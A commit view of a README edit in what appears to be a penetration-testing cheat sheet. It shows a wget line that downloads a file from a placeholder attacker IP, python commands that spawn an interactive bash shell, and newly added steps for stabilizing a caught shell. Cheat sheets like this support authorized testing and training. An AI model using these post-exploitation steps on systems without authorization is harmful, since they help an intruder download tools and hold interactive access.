Update README.md

This commit is contained in:
Joe Totes
2022-08-03 15:33:27 -04:00
committed by GitHub
parent 747e05a558
commit f2c95d6678

View File

@@ -392,4 +392,11 @@ wget http://{IP ADDRESS}/{FILE} -outfile {FILE}
python3 -c 'import pty;pty.spawn("/bin/bash")' python3 -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")' python -c 'import pty;pty.spawn("/bin/bash")'
# Additional Functionality
CTRL&Z
stty raw -echo; fg;
export TERM=xterm
``` ```